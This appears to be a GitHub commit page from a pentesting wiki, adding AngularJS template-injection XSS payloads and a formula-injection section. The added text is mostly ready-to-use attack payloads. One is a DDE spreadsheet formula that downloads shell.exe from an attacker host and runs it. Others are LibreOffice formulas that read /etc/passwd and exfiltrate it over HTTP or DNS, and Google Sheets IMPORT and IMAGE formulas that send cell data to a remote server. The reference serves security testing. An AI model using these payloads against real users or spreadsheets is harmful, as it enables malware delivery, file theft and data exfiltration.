Skip to content

Commit

Permalink
GitBook: [master] 2 pages modified
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Jun 29, 2021
1 parent 45f8827 commit bc72708
Show file tree
Hide file tree
Showing 2 changed files with 73 additions and 0 deletions.
5 changes: 5 additions & 0 deletions pentesting-web/client-side-template-injection-csti.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,13 +16,18 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)
{% hint style="danger" %}
\*\*\*\*[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
{% endhint %}
### VueJS
You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)
Expand Down
68 changes: 68 additions & 0 deletions pentesting-web/formula-injection.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,3 +43,71 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca

![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%281%29.png)

### More

```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```

## LFI

#### LibreOffice Calc

* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`

**Analyzing the DNS ex-filtration payload:**

* ‘file:///etc/passwd’\#$passwd.A19 – Will read the 19th line from the local /etc/passwd file
* ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\) – URL encode the returned data
* MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\) – Similar to substring, read data from 1st character to 41st – a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\) – replace all instances of % \(the special character from URL encoding\) with dash – this is ensure that only valid DNS characters are used
* CONCATENATE\(\(SUBSTITUTE\(MID\(\(ENCODEURL\(‘file:///etc/passwd’\#$passwd.A19\)\),1,41\),”%”,”-“\)\),”.&lt;FQDN&gt;\) – Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* WEBSERVICE – Will make a request for this non-existent DNS name which we can then parse the logs \(or run tcpdump etc.\) on the DNS authoritative name server for which we have control

## Google Sheets OOB Data Exfiltration

Firstly, let’s introduce some of the more interesting functions.

**CONCATENATE**: Appends strings to one another.

```text
=CONCATENATE(A2:E2)
```

**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.

```text
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```

**IMPORTFEED**: Imports a RSS or ATOM feed.

```text
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```

**IMPORTHTML**: Imports data from a table or list within an HTML page.

```text
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```

**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.

```text
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```

**IMAGE**: Inserts an image into a cell.

```text
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```

## References

{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}

0 comments on commit bc72708

Please sign in to comment.